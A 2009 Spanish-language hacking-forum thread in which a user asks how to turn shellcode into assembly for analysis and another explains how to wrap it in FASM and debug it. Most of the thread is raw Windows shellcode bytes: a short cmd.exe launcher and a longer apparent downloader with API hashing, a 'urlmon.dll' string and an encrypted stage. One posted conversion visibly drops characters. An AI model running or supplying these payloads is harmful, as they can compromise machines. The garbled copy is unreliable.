Shellcode/opcode to ASM?

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio

Ayuda

Ingresar

Registrarse

12 Febrero 2012, 20:20

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

Shellcode/opcode to ASM?

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Ir Abajo

Respuesta

Imprimir

Autor

Tema: Shellcode/opcode to ASM? (Leído 1,790 veces)

shimpei

Desconectado

Desconectado

Mensajes: 51

Ver Perfil

Shellcode/opcode to ASM?

« en: 15 Diciembre 2009, 02:46 »

alguien podria comentar sobre metodos practicos para pasar un shellcode a asm para analizarlo?


	En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

YST

Desconectado

Desconectado

Mensajes: 963

I'm you

Ver Perfil

WWW

Re: Shellcode/opcode to ASM?

« Respuesta #1 en: 15 Diciembre 2009, 03:22 »

No se si te entendi bien pero ... conviertes el shellcode a un hexadecimal comprencible para un ensamblador osea algo como por ejemplo :

ShellCode:

Código

char scode[]= // By Rojodos
   {0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xE6,0x45,0xF8,0x63,0xC6,0x45,0xF9,0x6D,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,0xC6,0x45,0xFE,0x65,0xB8,0x44,0x80,0xBF,0x77,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4};

Para FASM:

Código

db 0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xE6,0x45,0xF8,0x63,0xC6,0x45,0xF9,0x6D,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,0xC6,0x45,0xFE,0x65,0xB8,0x44,0x80,0xBF,0x77,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4

y luego en el mismo fasm en windows por ejemplo haces un

Código

include "win32ax.inc"
.code
start:
db 0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xE6,0x45,0xF8,0x63,0xC6,0x45,0xF9,0x6D,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,0xC6,0x45,0xFE,0x65,0xB8,0x44,0x80,0xBF,0x77,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4
.end start

Luego abres el exe generado con un depurador por ejemplo el olly debug


	En línea

Yo le enseñe a Kayser a usar objetos en ASM

shimpei

Desconectado

Desconectado

Mensajes: 51

Ver Perfil

Re: Shellcode/opcode to ASM?

« Respuesta #2 en: 15 Diciembre 2009, 03:52 »

ah, asi que solo deberia reemplazar las \ por 0 para poder compilarlo gracias a win32ax.inc

Citar

\x64\xA1\x18\x00\x00\x00\x8B\x40\x30\x8B\x40\x54\x8B\x40\x04\x8B
\x40\x04\x8B\x40\x04\x0D\x20\x00\x20\x00\x3D\x7C\x00\x77\x00\x74
\x01\xC3\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C
\xAD\x8B\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A
\x4E\x5A\xD1\xE2\x2B\xE2\x8B\xEC\xC7\x45\x10\x6E\x2E\x65\x78\xC7
\x45\x14\xFF\x01\x00\x00\xC7\x45\x00\x00\x00\x00\x00\xEB\x4F\x5A
\x52\x83\xEA\x56\x89\x55\x18\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78
\x03\xF3\x56\x8B\x76\x20\x03\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF
\x36\x0F\xBE\x14\x03\x38\xF2\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB
\xEF\x58\x3B\xF8\x75\xE5\x5E\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48
\x8B\x56\x1C\x03\xD3\x8B\x04\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D
\x1C\x57\x52\xB8\x33\xCA\x8A\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B
\xF7\xF2\xAE\x4F\x8B\x45\x10\xAB\x66\x98\x66\xAB\x33\xC0\xB8\x61
\x64\x00\x00\x50\x68\x54\x68\x72\x65\x35\x24\x1C\x69\x74\x50\x54
\x53\xB8\xAA\xFC\x0D\x7C\xFF\x55\x18\x83\xC4\x0C\x50\xB0\x6C\x8A
\xE0\x98\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E
\x4E\x0E\xEC\xFF\x55\x18\x83\xC4\x0C\x93\x50\x33\xC0\x50\x50\x56
\x8B\x55\x18\x03\x55\x14\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x18
\x5B\x83\x7D\x00\x01\x0F\x85\x9E\x00\x00\x00\x6A\x00\x68\x80\x00
\x00\x00\x6A\x03\x6A\x00\x6A\x03\x68\x00\x00\x00\xC0\x56\xB8\xA5
\x17\x00\x7C\xFF\x55\x18\x89\x45\x04\x6A\x04\x68\x00\x10\x00\x00
\x68\x00\x00\x08\x00\x6A\x00\xB8\x54\xCA\xAF\x91\xFF\x55\x18\x89
\x45\x0C\x50\x6A\x00\x8D\x4D\x08\x51\x68\x00\x00\x08\x00\x50\xFF
\x75\x04\xB8\x16\x65\xFA\x10\xFF\x55\x18\x5F\x8B\x17\x83\xC7\x04
\x8B\x4D\x08\x83\xE9\x04\xE8\xA7\x00\x00\x00\x6A\x00\x6A\x00\x6A
\x00\xFF\x75\x04\xB8\xAC\x08\xDA\x76\xFF\x55\x18\x6A\x00\x8D\x4D
\x08\x51\xFF\x75\x08\xFF\x75\x0C\x83\x04\x24\x04\xFF\x75\x04\xB8
\x1F\x79\x0A\xE8\xFF\x55\x18\xFF\x75\x04\xB8\xFB\x97\xFD\x0F\xFF
\x55\x18\xC7\x45\x00\x02\x00\x00\x00\x57\x56\xB8\x98\xFE\x8A\x0E
\xFF\x55\x18\xEB\x2A\x18\x2A\xF9\xB7\xD2\x77\xB3\x01\x45\x8A\x92
\xB7\xAD\x50\x5D\xE4\x67\xF5\xE6\xC7\x1A\xBF\xAB\x1E\x10\x42\x76
\xA2\xA1\x54\x63\x09\x7B\x89\xB0\xF4\x97\x4E\x73\x93\x3F\xF1\x83
\x7D\x00\x02\x74\x60\xC7\x45\x00\x01\x00\x00\x00\xC7\x45\x10\x79
\x2E\x65\x78\xC7\x45\x14\x72\x01\x00\x00\x8B\x7D\x18\x03\x7D\x14
\xB9\x26\x00\x00\x00\x8B\x57\xFC\xE8\x05\x00\x00\x00\xE9\x7C\xFE
\xFF\xFF\x33\xC0\x8A\x07\xD2\xC8\x32\xC1\xF6\xD0\x32\xC5\x32\xC2
\x32\xC6\xD2\xC0\x02\xC1\x02\xC5\x02\xC2\x02\xC6\xD2\xC8\x2A\xC1
\x2A\xC5\xF6\xD0\x2A\xC2\x2A\xC6\xD2\xC0\xD3\xC2\x0F\xCA\x88\x07
\x47\x49\x75\xCE\xC3\xC3

ahora bajo el fasm y lo pruebo, muchas gracias YST!


	En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

YST

Desconectado

Desconectado

Mensajes: 963

I'm you

Ver Perfil

WWW

Re: Shellcode/opcode to ASM?

« Respuesta #3 en: 15 Diciembre 2009, 04:28 »

Si no me comi ningun caracter seria algo de esta manera

Código

db 0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,0x40,0x54,0x8B,0x40,0x04,0x8B,0x40,0x04,0x8B,0x40,0x04,0x0D,0x20,0x00,0x20,0x00,0x3D,0x7C,0x00,0x77,0x00,0x74,0x01,0xC3,0x33,0xC0,0x64,0x8B,0x40,0x30,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C0xAD,0x8B,0x58,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,0x58,0x3C,0x6A,0x4E,0x5A,0xD1,0xE2,x2B,0xE2,0x8B,0xEC,0xC7,0x45,0x10,0x6E,0x2E,0x65,0x78,0xC7,0x45,0x14,0xFF,0x01,0x00,0x00,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0xEB,0x4F,0x5A,0x52,0x83,0xEA,0x56,0x89,0x55,0x18,0x56,0x57,0x8B,0x73,0x3C,0x8B,0x74,0x33,0x78,0x03,0xF3,0x56,0x8B,0x76,0x20,0x03,0xF3,0x33,0xC9,0x49,0x50,0x41,0xAD,0x33,0xFF,0x36,0x0F,0xBE,0x14,0x03,0x38,0xF2,0x74,0x08,0xC1,0xCF,0x0D,0x03,0xFA,0x40,0xEB,0xEF,0x58,0x3B,0xF8,0x75,0xE5,0x5E,0x8B,0x46,0x24,0x03,0xC3,0x66,0x8B,0x0C,0x48,0x8B,0x56,0x1C,0x03,0xD3,0x8B,0x04,0x8A,0x03,0xC3,0x5F,0x5E,0x50,0xC3,0x8D,0x7D,0x1C,0x57,0x52,0xB8,0x33,0xCA,0x8A,0x5B,0xE8,0xA2,0xFF,0xFF,0xFF,0x32,0xC0,0x8B,0xF7,0xF2,0xAE,0x4F,0x8B,0x45,0x10,0xAB,0x66,0x98,0x66,0xAB,0x33,0xC0,0xB8,0x61,0x64,0x00,0x00,0x50,0x68,0x54,0x68,0x72,0x65,0x35,0x24,0x1C,0x69,0x74,0x50,0x54,0x53,0xB8,0xAA,0xFC,0x0D,0x7C,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x50,0xB0,0x6C,0x8A,0xE0,0x98,0x50,0x68,0x6F,0x6E,0x2E,0x64,0x68,0x75,0x72,0x6C,0x6D,0x54,0xB8,0x8E,0x4E,0x0E,0xEC,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x93,0x50,0x33,0xC0,0x50,0x50,0x56,0x8B,0x55,0x18,0x03,0x55,0x14,0x52,0x50,0xB8,0x36,0x1A,0x2F,0x70,0xFF,0x55,0x18,0x5B,0x83,0x7D,0x00,0x01,0x0F,0x85,0x9E,0x00,0x00,0x00,0x6A,0x00,0x68,0x80,0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x56,0xB8,0xA5,0x17,0x00,0x7C,0xFF,0x55,0x18,0x89,0x45,0x04,0x6A,0x04,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x08,0x00,0x6A,0x00,0xB8,0x54,0xCA,0xAF,0x91,0xFF,0x55,0x18,0x89,0x45,0x0C,0x50,0x6A,0x00,0x8D,0x4D,0x08,0x51,0x68,0x00,0x00,0x08,0x00,0x50,0xFF,0x75,0x04,0xB8,0x16,0x65,0xFA,0x10,0xFF,0x55,0x18,0x5F,0x8B,0x17,0x83,0xC7,0x04,0x8B,0x4D,0x08,0x83,0xE9,0x04,0xE8,0xA7,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x75,0x04,0xB8,0xAC,0x08,0xDA,0x76,0xFF,0x55,0x18,0x6A,0x00,0x8D,0x4D,0x08,0x51,0xFF,0x75,0x08,0xFF,0x75,0x0C,0x83,0x04,0x24,0x04,0xFF,0x75,0x04,0xB8,0x1F,0x79,0x0A,0xE8,0xFF,0x55,0x18,0xFF,0x75,0x04,0xB8,0xFB,0x97,0xFD,0x0F,0xFF,0x55,0x18,0xC7,0x45,0x00,0x02,0x00,0x00,0x00,0x57,0x56,0xB8,0x98,0xFE,0x8A,0x0E,0xFF,0x55,0x18,0xEB,0x2A,0x18,0x2A,0xF9,0xB7,0xD2,0x77,0xB3,0x01,0x45,0x8A,0x92,0xB7,0xAD,0x50,0x5D,0xE4,0x67,0xF5,0xE6,0xC7,0x1A,0xBF,0xAB,0x1E,0x10,0x42,0x76,0xA2,0xA1,0x54,0x63,0x09,0x7B,0x89,0xB0,0xF4,0x97,0x4E,0x73,0x93,0x3F,0xF1,0x83,0x7D,0x00,0x02,0x74,0x60,0xC7,0x45,0x00,0x01,0x00,0x00,0x00,0xC7,0x45,0x10,0x79,0x2E,0x65,0x78,0xC7,0x45,0x14,0x72,0x01,0x00,0x00,0x8B,0x7D,0x18,0x03,0x7D,0x14,0xB9,0x26,0x00,0x00,0x00,0x8B,0x57,0xFC,0xE8,0x05,0x00,0x00,0x00,0xE9,0x7C,0xFE,0xFF,0xFF,0x33,0xC0,0x8A,0x07,0xD2,0xC8,0x32,0xC1,0xF6,0xD0,0x32,0xC5,0x32,0xC2,0x32,0xC6,0xD2,0xC0,0x02,0xC1,0x02,0xC5,0x02,0xC2,0x02,0xC6,0xD2,0xC8,0x2A,0xC1,0x2A,0xC5,0xF6,0xD0,0x2A,0xC2,0x2A,0xC6,0xD2,0xC0,0xD3,0xC2,0x0F,0xCA,0x88,0x07,0x47,0x49,0x75,0xCE,0xC3,


	En línea

Yo le enseñe a Kayser a usar objetos en ASM

shimpei

Desconectado

Desconectado

Mensajes: 51

Ver Perfil

Re: Shellcode/opcode to ASM?

« Respuesta #4 en: 17 Diciembre 2009, 17:51 »

intente compilar ese shellcode y me tiro error :-X

:-X

de todas formas gracias YST


	En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

YST

Desconectado

Desconectado

Mensajes: 963

I'm you

Ver Perfil

WWW

Re: Shellcode/opcode to ASM?

« Respuesta #5 en: 17 Diciembre 2009, 20:15 »

Vez me comí caracteres :xD

:xD

Código

include "win32ax.inc"
.code
start:
db 0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,0x40,0x54,0x8B,0x40,0x04,0x8B,0x40,0x04,0x8B,0x40,0x04,0x0D,0x20,0x00,0x20,0x00,0x3D,0x7C,0x00,0x77,0x00,0x74,0x01,0xC3,0x33,0xC0,0x64,0x8B,0x40,0x30,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C,0xAD,0x8B,0x58,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,0x58,0x3C,0x6A,0x4E,0x5A,0xD1,0xE2,0x2B,0xE2,0x8B,0xEC,0xC7,0x45,0x10,0x6E,0x2E,0x65,0x78,0xC7,0x45,0x14,0xFF,0x01,0x00,0x00,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0xEB,0x4F,0x5A,0x52,0x83,0xEA,0x56,0x89,0x55,0x18,0x56,0x57,0x8B,0x73,0x3C,0x8B,0x74,0x33,0x78,0x03,0xF3,0x56,0x8B,0x76,0x20,0x03,0xF3,0x33,0xC9,0x49,0x50,0x41,0xAD,0x33,0xFF,0x36,0x0F,0xBE,0x14,0x03,0x38,0xF2,0x74,0x08,0xC1,0xCF,0x0D,0x03,0xFA,0x40,0xEB,0xEF,0x58,0x3B,0xF8,0x75,0xE5,0x5E,0x8B,0x46,0x24,0x03,0xC3,0x66,0x8B,0x0C,0x48,0x8B,0x56,0x1C,0x03,0xD3,0x8B,0x04,0x8A,0x03,0xC3,0x5F,0x5E,0x50,0xC3,0x8D,0x7D,0x1C,0x57,0x52,0xB8,0x33,0xCA,0x8A,0x5B,0xE8,0xA2,0xFF,0xFF,0xFF,0x32,0xC0,0x8B,0xF7,0xF2,0xAE,0x4F,0x8B,0x45,0x10,0xAB,0x66,0x98,0x66,0xAB,0x33,0xC0,0xB8,0x61,0x64,0x00,0x00,0x50,0x68,0x54,0x68,0x72,0x65,0x35,0x24,0x1C,0x69,0x74,0x50,0x54,0x53,0xB8,0xAA,0xFC,0x0D,0x7C,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x50,0xB0,0x6C,0x8A,0xE0,0x98,0x50,0x68,0x6F,0x6E,0x2E,0x64,0x68,0x75,0x72,0x6C,0x6D,0x54,0xB8,0x8E,0x4E,0x0E,0xEC,0xFF,0x55,0x18,0x83,0xC4,0x0C,0x93,0x50,0x33,0xC0,0x50,0x50,0x56,0x8B,0x55,0x18,0x03,0x55,0x14,0x52,0x50,0xB8,0x36,0x1A,0x2F,0x70,0xFF,0x55,0x18,0x5B,0x83,0x7D,0x00,0x01,0x0F,0x85,0x9E,0x00,0x00,0x00,0x6A,0x00,0x68,0x80,0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x56,0xB8,0xA5,0x17,0x00,0x7C,0xFF,0x55,0x18,0x89,0x45,0x04,0x6A,0x04,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x08,0x00,0x6A,0x00,0xB8,0x54,0xCA,0xAF,0x91,0xFF,0x55,0x18,0x89,0x45,0x0C,0x50,0x6A,0x00,0x8D,0x4D,0x08,0x51,0x68,0x00,0x00,0x08,0x00,0x50,0xFF,0x75,0x04,0xB8,0x16,0x65,0xFA,0x10,0xFF,0x55,0x18,0x5F,0x8B,0x17,0x83,0xC7,0x04,0x8B,0x4D,0x08,0x83,0xE9,0x04,0xE8,0xA7,0x00,0x00,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x75,0x04,0xB8,0xAC,0x08,0xDA,0x76,0xFF,0x55,0x18,0x6A,0x00,0x8D,0x4D,0x08,0x51,0xFF,0x75,0x08,0xFF,0x75,0x0C,0x83,0x04,0x24,0x04,0xFF,0x75,0x04,0xB8,0x1F,0x79,0x0A,0xE8,0xFF,0x55,0x18,0xFF,0x75,0x04,0xB8,0xFB,0x97,0xFD,0x0F,0xFF,0x55,0x18,0xC7,0x45,0x00,0x02,0x00,0x00,0x00,0x57,0x56,0xB8,0x98,0xFE,0x8A,0x0E,0xFF,0x55,0x18,0xEB,0x2A,0x18,0x2A,0xF9,0xB7,0xD2,0x77,0xB3,0x01,0x45,0x8A,0x92,0xB7,0xAD,0x50,0x5D,0xE4,0x67,0xF5,0xE6,0xC7,0x1A,0xBF,0xAB,0x1E,0x10,0x42,0x76,0xA2,0xA1,0x54,0x63,0x09,0x7B,0x89,0xB0,0xF4,0x97,0x4E,0x73,0x93,0x3F,0xF1,0x83,0x7D,0x00,0x02,0x74,0x60,0xC7,0x45,0x00,0x01,0x00,0x00,0x00,0xC7,0x45,0x10,0x79,0x2E,0x65,0x78,0xC7,0x45,0x14,0x72,0x01,0x00,0x00,0x8B,0x7D,0x18,0x03,0x7D,0x14,0xB9,0x26,0x00,0x00,0x00,0x8B,0x57,0xFC,0xE8,0x05,0x00,0x00,0x00,0xE9,0x7C,0xFE,0xFF,0xFF,0x33,0xC0,0x8A,0x07,0xD2,0xC8,0x32,0xC1,0xF6,0xD0,0x32,0xC5,0x32,0xC2,0x32,0xC6,0xD2,0xC0,0x02,0xC1,0x02,0xC5,0x02,0xC2,0x02,0xC6,0xD2,0xC8,0x2A,0xC1,0x2A,0xC5,0xF6,0xD0,0x2A,0xC2,0x2A,0xC6,0xD2,0xC0,0xD3,0xC2,0x0F,0xCA,0x88,0x07,0x47,0x49,0x75,0xCE,0xC3
.end start


	En línea

Yo le enseñe a Kayser a usar objetos en ASM

Páginas: [1]

Ir Arriba

Respuesta

Imprimir

Ir a:

Mensajes similares
		Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
		Duda con opcode sete bl Ingeniería Inversa	.:UND3R:.	3	345	9 Septiembre 2011, 23:03 por apuromafo

Tema destacado: Team Oficial HWBot.org de elhacker.net

elotrolado	lawebdegoku	MundoDivx	Hispabyte	Truzone
ZonaPhotoshop	Yashira.org	Videojuegos	indetectables.net	Seguridad Colombia
Indejuegos	Seguridad Informática	Juegos de Mario	Internet móvil	Noticias Informatica
ADSL	eNYe Sec	Seguridad Wireless	Underground México	Biblioteca de Seguridad
InSecurity.Ro - ISR	Soluciones Web	ejemplos de	El Lado del Mal	Blog Administrador Sistemas
Blog Uxio	thehackerway

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines